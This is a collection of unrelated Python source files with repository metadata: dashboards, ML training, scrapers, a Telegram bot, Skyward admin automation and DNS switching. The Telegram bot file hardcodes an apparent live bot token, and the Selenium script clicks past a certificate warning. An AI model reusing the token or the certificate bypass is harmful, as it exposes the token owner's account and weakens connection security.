# https://docs.djangoproject.com/en/3.1/topics/http/sessions/
# "If value is None,
# the session reverts to using the global session expiry policy."
self.expiry = None
elif isinstance(value, int) and value >= 0:
self.expiry = value
elif isinstance(value, (datetime, timedelta)):
self.expiry = value
| rexzhang/django-light-auth | django_light_auth/apps.py | apps.py | py | 1,598 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.apps.AppConfig",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "uuid.uuid4",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
... |
34541981528 | import dash
from dash import html
from dash import dcc
from dash.dependencies import Input, Output
import dash_bootstrap_components as dbc
import pandas as pd
import numpy as np
import calendar
import plotly.express as px
import plotly.graph_objects as go
import datamodel
order = datamodel.get_data()
df_year = datamodel.get_year()
df_month = datamodel.get_month()
fig_employee = px.bar(order,
x='emp_name', y='total',
color='type', text='total', title='SALES BY EMPLOYEE',
color_discrete_sequence=["darkred", "green"],
template='plotly_dark',
hover_data=[],
labels={'total':'Total sales', 'emp_name':'Employee', 'type':'Product Type', 'font': {'color': 'white'}})
fig_employee.update_traces(texttemplate='%{text:.2s}', textposition='outside')
fig_employee.update_layout(uniformtext_minsize=8, uniformtext_mode='hide', xaxis_tickangle=45)
fig_products = px.bar(order,
x='productname', y='total',
color='type', text='total', title='SALES BY PRODUCTS',
color_discrete_sequence=["darkred", "green"],
template='plotly_dark',
hover_data=[],
labels={'total':'Total sales', 'productname':'Product', 'type':'Product Type'})
fig_products.update_traces(texttemplate='%{text:.2s}', textposition='outside')
fig_products.update_layout(uniformtext_minsize=8, uniformtext_mode='hide', xaxis_tickangle=45)
dash_app = dash.Dash(__name__)
app = dash_app.server
dash_app.layout = html.Div(style={'backgroundColor':'lightgrey'},
children=[
html.Div(className='row',
children=[
html.Div(
children=[
dcc.Graph(id="sales_employee", figure=fig_employee),
dcc.Graph(id="sales_product", figure=fig_products)])
]
),
]
)
if __name__ == '__main__':
dash_app.run_server(debug=True)
| Patriciatworek1998/patr_demo_dash | app.py | app.py | py | 1,928 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datamodel.get_data",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "datamodel.get_year",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datamodel.get_month",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "plotly.expr... |
6314719484 | import os
import sys
os.environ["TOKENIZERS_PARALLELISM"] = "true"
sys.path.insert(0, os.getcwd())
import gc
import time
import random
import warnings
warnings.filterwarnings("ignore")
import wandb
import os
import sys
import argparse
from datasets import load_dataset
import torch
from transformers import AutoTokenizer
from src.data.preprocess import preprocess_text, get_max_len_from_df
from src.dataset.collators import collate
from src.dataset.EmotionDataset import get_valid_dataloader, get_train_dataloader
from src.adversarial_learning.awp import AWP
import numpy as np
from src.utils import AverageMeter, time_since, get_config, dictionary_to_namespace
from src.models.utils import get_model
from optimizer.optimizer import get_optimizer
from criterion.criterion import get_criterion
from scheduler.scheduler import get_scheduler
from criterion.score import get_score
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--cfg', type=str, required=True)
parser.add_argument('--run_id', type=str, required=True)
parser.add_argument('--use_wandb', action='store_true')
arguments = parser.parse_args()
return arguments
def load_data():
# load the dataset
dataset = load_dataset("dair-ai/emotion")
dataset.set_format(type="pandas")
train_df = dataset['train'][:]
val_df = dataset['validation'][:]
test_df = dataset['test'][:]
return train_df, val_df, test_df
def get_tokenizer(config):
tokenizer = AutoTokenizer.from_pretrained(config.model.backbone_type,
use_fast=True
)
tokenizer.save_pretrained(config.general.tokenizer_dir_path)
return tokenizer
def seed_everything(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
def valid_fn(config, valid_dataloader, model, criterion, epoch, device):
valid_losses = AverageMeter()
model.eval()
predictions = []
start = time.time()
for step, (inputs, labels) in enumerate(valid_dataloader):
inputs = collate(inputs)
for k, v in inputs.items():
inputs[k] = v.to(device)
labels = labels.to(device)
batch_size = labels.size(0)
with torch.no_grad():
y_preds = model(inputs)
loss = criterion(y_preds, labels)
valid_losses.update(loss.item(), batch_size)
predictions.append(y_preds.to('cpu').numpy())
if step % config.general.valid_print_frequency == 0 or step == (len(valid_dataloader) - 1):
remain = time_since(start, float(step + 1) / len(valid_dataloader))
print('EVAL: [{0}][{1}/{2}] '
'Elapsed: {remain:s} '
'Loss: {loss.avg:.4f} '
.format(epoch+1, step+1, len(valid_dataloader),
remain=remain,
loss=valid_losses))
if config.logging.use_wandb:
wandb.log({f"Validation loss": valid_losses.val})
predictions = np.concatenate(predictions)
return valid_losses, predictions
def train_loop(config, train_df, val_df, device):
# get the validation label
valid_labels = val_df['label'].to_numpy()
# prepare the data loaders
train_dataloader = get_train_dataloader(config, train_df)
valid_dataloader = get_valid_dataloader(config, val_df)
# prepare the model
model = get_model(config)
model.to(device)
# preprare the optimizer
optimizer = get_optimizer(model, config)
# get the steps to finish one epoch
train_steps_per_epoch = int(len(train_df) / config.general.train_batch_size)
# overall steps
num_train_steps = train_steps_per_epoch * config.training.epochs
# evaluation steps to finish one epoch
eval_steps_per_epoch = int(len(val_df) / config.general.valid_batch_size)
# overall eval steps
num_eval_steps = eval_steps_per_epoch * config.training.epochs
# according to the author's and other users experiences
# it helped to increase accuracy significantly
awp = AWP(model=model,
optimizer=optimizer,
adv_lr=config.adversarial_learning.adversarial_lr,
adv_eps=config.adversarial_learning.adversarial_eps,
adv_epoch=config.adversarial_learning.adversarial_epoch_start)
# get the loss function
criterion = get_criterion(config)
# get scheduler
scheduler = get_scheduler(optimizer, config, num_train_steps)
best_score = np.inf
for epoch in range(config.training.epochs):
start_time = time.time()
model.train()
scaler = torch.cuda.amp.GradScaler(enabled=config.training.apex)
train_losses = AverageMeter()
valid_losses = None
score, scores = None, None
start = time.time()
global_step = 0
for step, (inputs, labels) in enumerate(train_dataloader):
# collate
inputs = collate(inputs)
for k, v in inputs.items():
inputs[k] = v.to(device)
labels = labels.to(device)
awp.perturb(epoch)
batch_size = labels.size(0)
with torch.cuda.amp.autocast(enabled=config.training.apex):
y_preds = model(inputs)
loss = criterion(y_preds, labels)
train_losses.update(loss.item(), batch_size)
scaler.scale(loss).backward()
awp.restore()
if config.training.unscale:
scaler.unscale_(optimizer)
grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), config.training.max_grad_norm)
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
global_step += 1
scheduler.step()
if (step % config.general.train_print_frequency == 0) or \
(step == (len(train_dataloader) - 1)):
remain = time_since(start, float(step + 1) / len(train_dataloader))
print(f'Epoch: [{epoch+1}][{step+1}/{len(train_dataloader)}] '
f'Elapsed {remain:s} '
f'Loss: {train_losses.val:.4f}({train_losses.avg:.4f}) '
f'Grad: {grad_norm:.4f} '
f'LR: {scheduler.get_lr()[0]:.8f} ')
valid_losses, predictions = valid_fn(config, valid_dataloader, model, criterion, epoch, device)
score = valid_losses.avg
accuracy = get_score(valid_labels, predictions)
print(f'Epoch {epoch+1} - Score: {score:.4f} - Accuracy: {accuracy:.4f}')
# here we are assuming the score as accuracy
if score < best_score:
best_score = score
torch.save({'model': model.state_dict(), 'predictions': predictions}, os.path.join(config.general.model_fn_path, "best.pth"))
print(f'\nEpoch {epoch + 1} - Save Best Score: {best_score:.4f} Model\n')
# save the full state of the model as last.pth
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': criterion,
}, os.path.join(config.general.model_fn_path, "last.pth"))
unique_parameters = ['.'.join(name.split('.')[:4]) for name, _ in model.named_parameters()]
learning_rates = list(set(zip(unique_parameters, scheduler.get_lr())))
if config.logging.use_wandb:
wandb.log({f'{parameter} lr': lr for parameter, lr in learning_rates})
wandb.log({f'Best Score': best_score})
elapsed = time.time() - start_time
print(f'Epoch {epoch + 1} - avg_train_loss: {train_losses.avg:.4f} '
f'avg_val_loss: {valid_losses.avg:.4f} time: {elapsed:.0f}s '
f'Epoch {epoch + 1} - Score: {score:.4f} Accuracy{accuracy}\n, '
'=============================================================================\n')
if config.logging.use_wandb:
wandb.log({f"Epoch": epoch + 1,
f"avg_train_loss": train_losses.avg,
f"avg_val_loss": valid_losses.avg,
f"accuracy":accuracy,
f"Score": score,
})
torch.cuda.empty_cache()
gc.collect()
def main(config):
# load the data
train_df, val_df, test_df = load_data()
feat_col = 'text'
label_col = 'label'
# apply preprocessing
train_df[feat_col] = train_df[feat_col].apply(preprocess_text)
val_df[feat_col] = val_df[feat_col].apply(preprocess_text)
test_df[feat_col] = test_df[feat_col].apply(preprocess_text)
tokenizer = get_tokenizer(config)
config.tokenizer = tokenizer
if config.general.set_max_length_from_data:
print('Setting max length from data')
config.general.max_length = get_max_len_from_df(train_df, tokenizer)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# start the trainng loop
train_loop(config, train_df, val_df, device)
def create_folders(config):
config.general.model_fn_path = os.path.join(config.general.model_fn_path, config.run_id)
config.general.log_path = os.path.join(config.general.log_path, config.run_id)
config.general.tokenizer_dir_path = os.path.join(config.general.tokenizer_dir_path, config.model.backbone_type)
if(os.path.exists(config.general.model_fn_path)):
raise IOError('This run id is already used pls use different')
os.makedirs(config.general.model_fn_path)
os.makedirs(config.general.log_path)
os.makedirs(config.general.tokenizer_dir_path, exist_ok=True)
def init_wandb(config, args):
backbone_type = config.model.backbone_type
criterion_type = config.criterion.criterion_type
pooling_type = config.model.pooling_type
wandb.login(key='')
wandb_run = wandb.init(
project=config.logging.wandb.project,
group=args.run_id,
job_type='train',
tags=[backbone_type, criterion_type, pooling_type, args.run_id],
config=config,
name=f'{args.run_id}'
)
return wandb_run
if __name__ == '__main__':
args = parse_args()
config_path = os.path.join(args.cfg)
config = get_config(config_path)
config = dictionary_to_namespace(config)
config.run_id = args.run_id
config.logging.use_wandb = args.use_wandb
create_folders(config)
init_wandb(config, args)
if(config.logging.use_wandb):
seed_everything(seed=config.general.seed)
main(config)
| ixtiyoruz/EmotionClassification | src/train.py | train.py | py | 11,025 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_numb... |
70850460263 | import pandas as pd
import os
import time
from datetime import datetime
from os import listdir
from os.path import isfile, join
path ="/Users/Sanjay/Documents/StockPredictor/TodayStats"
def key_stats(gather="Total Debt/Equity"):
statspath=path+'/TodayStats'
#k = [225,226,227,228,229,230,231,232,233,234,235]
stock_list = [f for f in listdir(path) if isfile(join(path,f))]
df=pd.DataFrame(columns= ['Date','Unix','Ticker','DE ratio','Price','DOW30'])
dow30_today_df = pd.read_csv("/Users/Sanjay/Documents/StockPredictor/TodaySummaryRpt/summaryReport.csv")
dow30_df = pd.read_csv("/Users/Sanjay/Documents/StockPredictor/DJI.csv", names = ['Date','Open','High','Low','Close','Adj Close','Volume'])
#print(stock_list)
for each_dir in stock_list[1:]:
#i = k[0]
each_file = each_dir
ticker=each_dir.split("_")[1].split(".")[0]
#print(each_file, " ",ticker, "\n")
#time.sleep(15)
if len(each_file) > 0:
filename=each_dir.split("_")[0]
date_stamp = datetime.strptime(filename,'%Y%m%d')
unix_time=time.mktime(date_stamp.timetuple())
#print(date_stamp, unix_time)
#time.sleep(5)
full_file_path=path+"/"+each_file
#print(full_file_path)
source=open(full_file_path,'r').read()
#print(source)
try:
i = int(source.split(gather+'</span><!-- react-text: ')[1].split(' -->')[0])
x = i+1
y = i+2
z = i+3
#--below 3 lines only for testing errors--
#print(i,x,y,z)
#intermediarystring ='</span><!-- react-text: '+str(i)+' --> <!-- /react-text --><!-- react-text: '+str(x)+' -->(mrq)<!-- /react-text --><sup aria-label="KS_HELP_SUP_undefined" data-reactid="'+str(y)+'"></sup></td><td class="Fz(s) Fw(500) Ta(end)" data-reactid="'+str(z)+'">'
#print(intermediarystring)
#--resume code--
devalue = float(source.split(gather+'</span><!-- react-text: '+str(i)+' --> <!-- /react-text --><!-- react-text: '+str(x)+' -->(mrq)<!-- /react-text --><sup aria-label="KS_HELP_SUP_undefined" data-reactid="'+str(y)+'"></sup></td><td class="Fz(s) Fw(500) Ta(end)" data-reactid="'+str(z)+'">')[1].split('</td>')[0])
#find the stock price value for the day
for index, row in dow30_today_df.iterrows():
#a = row['Company'].split(" ")[1]
if ticker in row['Company']:
#print(a)
stock_price = row['Price']
break;
#dow30_date = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')
#print("Date:",date_stamp,"Unix:",unix_time,"Ticker:",ticker,"DE ratio:",devalue,"Price:",stock_price,"dow30_date:",dow30_date)
#print("devalue:",devalue,"ticker:",ticker,"stock price:",stock_price)
dow30_date=datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')
#print("devalue:",devalue,"ticker:",ticker,"stock price:",stock_price,"dow30date:",dow30_date)
row = dow30_df[(dow30_df['Date'] == dow30_date)]
dow30_value = float(row["Adj Close"])
print("Date:",date_stamp,"Unix:",unix_time,"Ticker:",ticker,"DE ratio:",devalue,"Price:",stock_price,"Dow30:",dow30_value)
#for index, row in dow30_df.iterrows():
# print("for loop", index, str(dow30_df["Date"]))
#
# if str(dow30_date) == str(dow30_df["Date"]):
# dow30_value = float(dow30_df["Adj Close"])
# print("dow30_value:",dow30_value)
# break;
df=df.append({'Date':date_stamp,'Unix':unix_time,'Ticker':ticker,'DE ratio':devalue,'Price':stock_price,'DOW30':dow30_value},ignore_index=True)
except Exception as e:
#print("guess this ain't happenin' in "+ticker)
devalue = 0
for index, row in dow30_today_df.iterrows():
if ticker in row['Company']:
#print(a)
stock_price = row['Price']
break;
dow30_date=datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')
row = dow30_df[(dow30_df['Date'] == dow30_date)]
dow30_value = float(row["Adj Close"])
print("Date:",date_stamp,"Unix:",unix_time,"Ticker:",ticker,"DE ratio:",devalue,"Price:",stock_price,"Dow30:",dow30_value)
df=df.append({'Date':date_stamp,'Unix':unix_time,'Ticker':ticker,'DE ratio':devalue,'Price':stock_price,'DOW30':dow30_value},ignore_index=True)
print(df.values)
save= gather.replace(' ','').replace(')','').replace('(','').replace('/','')+('.csv')
print(save)
df.to_csv(save)
key_stats()
| cloudmesh-community/fa18-523-66 | project-code/PredictDowIndex_1.py | PredictDowIndex_1.py | py | 5,169 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.isfile",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_n... |
19331078030 | import telebot
from model_predict import predict
from preprocessing import preprocess_text
bot = telebot.TeleBot(
"2087987681:AAG813Ais8YRNy4nlhrHZTK5UfQc4ZYa55Y", parse_mode=None)
# for /start and /help commands
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
bot.reply_to(message, "Enter a message and we'll predict if it's hateful or not.")
@bot.message_handler(commands=['preprocess'])
def send_welcome(message):
bot.reply_to(message, preprocess_text(message.text))
@bot.message_handler(func=lambda m: True)
def echo_all(message):
toReturn = predict(message.text)
if toReturn == 1:
bot.reply_to(message, "Your message is hate")
else:
bot.reply_to(message, "Your message is fine")
# not replying to the toReturn # bot.send_message(message.chat.id, "it's working!!")
bot.infinity_polling()
| Jenpoer/pythoneers-hatespeech-bot | pythoneers_hatespeechbot.py | pythoneers_hatespeechbot.py | py | 876 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "preprocessing.preprocess_text",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "model_predict.predict",
"line_number": 24,
"usage_type": "call"
}
] |
71354369385 | #!/bin/usr/env python
# ===========================================================
# Created By: Richard Barrett
# Organization: DVISD
# DepartmenT: Data Services
# Purpose: Skyward Administration
# Date: 04/01/2020
# ===========================================================
import selenium
import shutil
import xlsxwriter
import os
import unittest
import requests
import subprocess
import getpass
import platform
import socket
import ssl
import pynput
import logging
import time
from pynput.keyboard import Key, Controller
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from datetime import date
decrypt = "gpg --output secrets.json --decrypt secrets.gpg"
if os.path.exists("secrets.gpg"):
returned_value = subprocess.call(decrypt, shell=True)
else:
print("The file does not exist!")
print("You should probably create a secret!")
print("gpg --output filename.gpg --encrypt filename.json")
import json
with open('secrets.json','r') as f:
config = json.load(f)
# Definitions
# find_elements_by_name
# find_elements_by_xpath
# find_elements_by_link_text
# find_elements_by_partial_link_text
# find_elements_by_tag_name
# find_elements_by_class_name
# find_elements_by_css_selector
# System Variables
today = date.today()
date = today.strftime("%m/%d/%Y")
node = platform.node()
system = platform.system()
username = getpass.getuser()
version = platform.version()
keyboard = Controller()
# Upload Path Variables
file_input_inactive_users = os.path.abspath("C:\Imports\CustomNameNeedsFormatting_02_24_2020_20_14_12_richardbarrett")
# URL Variables
login_url = ''
redirect_url = ''
reports_scheduler_url = ''
custom_reports_url = ''
# Check for Version of Chrome
# WebDriver Path for System
if platform.system() == ('Windows'):
browser = webdriver.Chrome("C:\Program Files (x86)\Google\Chrome\chromedriver.exe")
elif platform.system() == ('Linux'):
browser = webdriver.Chrome(executable_path='/home/rbarrett/Drivers/Google/Chrome/chromedriver_linux64/chromedriver')
elif platform.system() == ('Darwin'):
browser = webdriver.Chrome(executable_path='~/Drivers/Google/Chrome/chromedriver_mac64/chromedriver')
else:
print("Are you sure you have the Selenium Webdriver installed in the correct path?")
# tearDown Method
def tearDown(self):
self.browser.close()
# shutDown Method
def shutDown(self):
self.browser.quit()
# Parent URL
#browser.get("https://skyward-student.del-valle.k12.tx.us/scripts/wsisa.dll/WService=wsEAplus/seplog01.w?nopopup=true")
#options.addArguments("--ignore-certificate-errors")
browser.get("https://skyward-dev.del-valle.k12.tx.us/scripts/wsisa.dll/WService=wsEAplusTrn/seplog01.w?nopopup=true")
time.sleep(5)
# Click on Advanced Button for Certificate Error
# XPATH //*[@id='details-button']
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, "//*[@id='details-button']")))
element.click();
# Click on Proceed
# XPATH //*[@id'proceed-link']
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.ID, "proceed-link")))
element.click();
time.sleep(10)
# Credentials NEEDS UNIT TEST
username = browser.find_element_by_id("login")
password = browser.find_element_by_id("password")
username.send_keys(config['user']['name'])
password.send_keys(config['user']['password'])
# Authentication submit.click()
# For XPATH = //*[@id='bLogin']
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, "//*[@id='bLogin']")))
element.click();
print("Logging into <insert_program>!")
print("Authenticated")
# Click and Span Skyward Contact Access
# Adminsitration XPATH = //*[@id='nav_ContactAccess']/span
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, "//*[@id='nav_ContactAccess']/span")))
element.click();
# Click on Secured Users
# XPATH = //a[@id='nav_SecuredUsers']/span
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, "//a[@id='nav_SecuredUsers']/span")))
element.click();
# Load users.json File
with open('users.json','r') as f:
config = json.load(f)
# Start Forlopp
# Send Keys to Lookup
# XPATH = //*[@id='brSecuredUsersLookupInput']
target_user = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, "//*[@id='brSecuredUsersLookupInput']")))
target_user.send_keys(config['sec_group_removal']['name_key']);
target_user.send_keys(Keys.RETURN);
time.sleep(2)
# Expand Button on Element Needing Sec Group Removal
# Class "bd_open"
print("fault 1")
time.sleep(2)
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.CLASS_NAME, "bd_closed")))
element.click()
time.sleep(2)
print("post fault 1")
time.sleep(2)
# Click on Remove All Groups By Link Text
# find_elements_by_link_text
print("fault 2")
time.sleep(2)
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.LINK_TEXT, "Remove All Groups")))
element.click()
time.sleep(2)
print("post fault 2")
time.sleep(2)
# Browser Switches to New Window Alert for Verification
# Browser Switches to Window
#WebDriverWait(browser,10).until(EC.number_of_windows_to_be(2))
#browser.switch_to.window(browser.window_handles[-1])
# Click Ok by ID
# XPATH //*[@id='msgBtn1']
time.sleep(2)
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, "//*[@id='msgBtn1']")))
element.click()
time.sleep(2)
# End For Loop
| aiern/ITDataServicesInfra | Python/Skyward/Administration/remove_sec_groups_inactive_users.py | remove_sec_groups_inactive_users.py | py | 5,755 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "subprocess.call",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_num... |
36517097823 | import json
from sqlite_testdb import SqliteTest
class TestSbsVariationApi(SqliteTest):
def test_get_integrity(self):
"""
Tests if expected result is returned for integrity api
"""
actual_json = self.client.get('/sbs/analyses/1/integrities')
actual_json = json.loads(actual_json.data)
self.assertEqual('Success', actual_json['status']['message'])
self.assertEqual(1, actual_json['data'][0]['id'])
def test_update_tier(self):
"""
Tests if tier_label is updated for single or multiple variation
"""
variation_list = [dict(variation_id=1, tier_label='Ignore')]
request_data = json.dumps(dict(variation_list=variation_list))
actual_json = self.client.put('/sbs/variations', data=request_data,
content_type='application/json')
actual_json = json.loads(actual_json.data)
self.assertEqual('Success', actual_json['status']['message'])
self.assertEqual(1, actual_json['data'][0]['id'])
def test_update_tier_with_incorrect_variation_id(self):
"""
Tests if error is returned for incorrect variation_id
"""
variation_list = [dict(variation_id='2a', tier_label='Ignore')]
request_data = json.dumps(dict(variation_list=variation_list))
actual_json = self.client.put('/sbs/variations', data=request_data,
content_type='application/json')
actual_json = json.loads(actual_json.data)
self.assertEqual('Error', actual_json['status']['message'])
| rohitbs113/DupontSBS | tests/test_sbs_variation.py | test_sbs_variation.py | py | 1,611 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite_testdb.SqliteTest",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "json.loads",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_... |
15130460020 | # Databricks notebook source
# MAGIC %pip install -r requirements.txt
# COMMAND ----------
import warnings
warnings.filterwarnings("ignore")
# COMMAND ----------
# MAGIC %sh
# MAGIC mkdir -p /dbfs/FileStore/solution_accelerators/digitization/ && touch /dbfs/FileStore/solution_accelerators/digitization/init.sh
# MAGIC cat <<EOF > /dbfs/FileStore/solution_accelerators/digitization/init.sh
# MAGIC #!/usr/bin/env bash
# MAGIC sudo apt-get install -y tesseract-ocr
# MAGIC sudo apt-get install -y poppler-utils
# MAGIC EOF
# COMMAND ----------
# Set mlflow experiment explicitly to make sure the code runs in both interactive execution and job execution
import mlflow
username = dbutils.notebook.entry_point.getDbutils().notebook().getContext().userName().get()
mlflow.set_experiment('/Users/{}/document_digitization'.format(username))
model_name = 'table_classification'
# COMMAND ----------
# Set sector to include brewing companies
sector = 'i22'
# Here we use a `/tmp/...` path in DBFS to minimize dependency. We recommend using a `/mnt/...` path or one that directly connects to your cloud storage for production usage. To learn more about mount points, please review [this document](https://docs.databricks.com/dbfs/mounts.html). If you would like to use a mount point or a different path, please update the variable below with the appropriate path:
landing_zone = '/tmp/fsi/datasets/digitization/csr/files'
k = 3
landing_zone_fs = '{}/**/pages'.format(landing_zone)
# COMMAND ----------
| databricks-industry-solutions/digitization-documents | config/configure_notebook.py | configure_notebook.py | py | 1,508 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "mlflow.set_experiment",
"line_number": 24,
"usage_type": "call"
}
] |
16520579385 | import datetime
from operator import itemgetter
from django.core.management.base import BaseCommand, CommandError
from django.db.models import *
from buckley.models import *
def cache_totals():
totals = Total.objects.all()
if totals:
total = totals[0]
else:
total = Total()
ie_total = Expenditure.objects.filter(candidate__cycle=2010, electioneering_communication=False).aggregate(total=Sum('expenditure_amount'))['total']
total.ie_total = ie_total
ec_total = Expenditure.objects.filter(electioneering_communication=True).aggregate(total=Sum('expenditure_amount'))['total']
total.ec_total = ec_total
total.total = ie_total or 0 + ec_total or 0
by_party = sorted(list(Expenditure.objects.exclude(support_oppose='', candidate__party='').filter(candidate__cycle=2010, candidate__party__in=['R', 'D',]).values('candidate__party', 'support_oppose').annotate(amt=Sum('expenditure_amount'))), key=itemgetter('candidate__party', 'support_oppose'), reverse=True)
for i in by_party:
i['party_cmtes'] = Expenditure.objects.filter(candidate__cycle=2010, committee__tax_status='FECA Party', candidate__party=i['candidate__party'], support_oppose=i['support_oppose']).aggregate(t=Sum('expenditure_amount'))['t'] or 0
i['non_party_cmtes'] = Expenditure.objects.exclude(committee__tax_status='FECA Party').filter(candidate__cycle=2010, candidate__party=i['candidate__party'], support_oppose=i['support_oppose']).aggregate(t=Sum('expenditure_amount'))['t'] or 0
for i in by_party:
if i['candidate__party'] == 'R' and i['support_oppose'] == 'S':
total.republican_support_nonparty = i['non_party_cmtes']
total.republican_support_party = i['party_cmtes']
total.republican_support_total = i['amt']
elif i['candidate__party'] == 'R' and i['support_oppose'] == 'O':
total.republican_oppose_nonparty = i['non_party_cmtes']
total.republican_oppose_party = i['party_cmtes']
total.republican_oppose_total = i['amt']
elif i['candidate__party'] == 'D' and i['support_oppose'] == 'S':
total.democrat_support_nonparty = i['non_party_cmtes']
total.democrat_support_party = i['party_cmtes']
total.democrat_support_total = i['amt']
elif i['candidate__party'] == 'D' and i['support_oppose'] == 'O':
total.democrat_oppose_nonparty = i['non_party_cmtes']
total.democrat_oppose_party = i['party_cmtes']
total.democrat_oppose_total = i['amt']
cutoff = datetime.date.today() - datetime.timedelta(days=5)
non_party_committees = Expenditure.objects.filter(candidate__cycle=2010, expenditure_date__gt=cutoff).exclude(Q(committee__slug='') | Q(committee__tax_status='FECA Party')).order_by('committee').values('committee__name', 'committee__slug').annotate(amount=Sum('expenditure_amount')).order_by('-amount')
TopCommittee.objects.all().delete()
for committee in non_party_committees[:10]:
c = Committee.objects.get(slug=committee['committee__slug'])
amount = committee['amount']
TopCommittee.objects.create(committee=c,
amount=amount)
party_committees = Expenditure.objects.filter(candidate__cycle=2010, expenditure_date__gt=cutoff, committee__tax_status='FECA Party').exclude(committee__slug='').order_by('committee').values('committee__name', 'committee__slug').annotate(amount=Sum('expenditure_amount')).order_by('-amount')
TopPartyCommittee.objects.all().delete()
for committee in party_committees[:10]:
c = Committee.objects.get(slug=committee['committee__slug'])
amount = committee['amount']
TopPartyCommittee.objects.create(committee=c,
amount=amount)
top_races = Expenditure.objects.exclude(race='', candidate=None).filter(candidate__cycle=2010, expenditure_date__gt=cutoff).order_by('race').values('race').annotate(amount=Sum('expenditure_amount')).order_by('-amount')
TopRace.objects.all().delete()
for race in top_races[:10]:
TopRace.objects.create(race=race['race'],
amount=race['amount'])
top_candidates = Expenditure.objects.filter(candidate__cycle=2010, expenditure_date__gt=cutoff).order_by('candidate').values('candidate').annotate(amount=Sum('expenditure_amount')).order_by('-amount')[:10]
TopCandidate.objects.all().delete()
for candidate in top_candidates[:10]:
try:
TopCandidate.objects.create(candidate=Candidate.objects.get(pk=candidate['candidate']),
amount=candidate['amount'])
except Candidate.DoesNotExist:
continue
total.save()
class Command(BaseCommand):
def handle(self, *args, **options):
cache_totals()
| sunlightlabs/reportingsite | buckley/management/commands/cache_totals.py | cache_totals.py | py | 4,878 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "operator.itemgetter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": "datetime.t... |
40130281674 | #!/usr/bin/env python
#coding=utf-8
# pip install aliyun-python-sdk-alidns
from aliyunsdkcore import client
from aliyunsdkalidns.request.v20150109 import SetDomainRecordStatusRequest
from flask import current_app
from datetime import datetime
class UpRecordStatus(object):
'''
region_id需要提交工单查询,默认cn_hangzhou
域名解析变更,把小米FDS的cname解析暂停 => 把阿里OSS的cname解析启用
'''
def __init__(self):
self.clt = client.AcsClient(
current_app.config['DNSACCESSKEYID'],
current_app.config['DNSACCESSKEYSECRET'])
self.request = SetDomainRecordStatusRequest.SetDomainRecordStatusRequest()
self.request.set_accept_format('json')
def changestatus(self):
for recordid in current_app.config['ENABLELIST']:
# 设置参数
self.request.add_query_param('Status', 'Enable')
self.request.add_query_param('RecordId', recordid)
# 发起请求
self.clt.do_action(self.request)
print(datetime.now(),'启用dns'+recordid)
for recordid in current_app.config['DISABLELIST']:
self.request.add_query_param('Status', 'Disable')
self.request.add_query_param('RecordId', recordid)
self.clt.do_action(self.request)
print(datetime.now(),'暂停dns'+recordid) | fish2018/prometheus_exporter | utils/alidns.py | alidns.py | py | 1,385 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "aliyunsdkcore.client.AcsClient",
